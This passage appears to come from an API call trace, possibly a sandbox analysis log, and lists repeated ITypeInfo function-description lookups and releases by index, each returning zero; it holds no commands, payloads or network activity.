ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x49, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x50, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x51, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x52, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x53, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x54, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x55, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x56, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x57, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x58, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x59, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x60, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x61, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x62, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x63, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x64, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x65, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x66, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x67, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x68, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x69, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.335] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.335] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x70, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x71, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x72, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x73, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x74, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x75, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x76, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x77, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x78, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x79, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.336] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.336] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x80, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x81, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x82, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x83, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x84, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x85, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x86, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x87, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x88, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x89, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x90, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x91, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x92, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x93, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.337] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.337] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x94, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x95, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x96, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x97, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x98, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x99, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa2, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.338] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xaa, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xab, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xac, ppFuncDesc=0x186c68, pDummy=0x140 | out: ppFuncDesc=0x186c68, pDummy=0x140) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xad, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.339] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xae, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 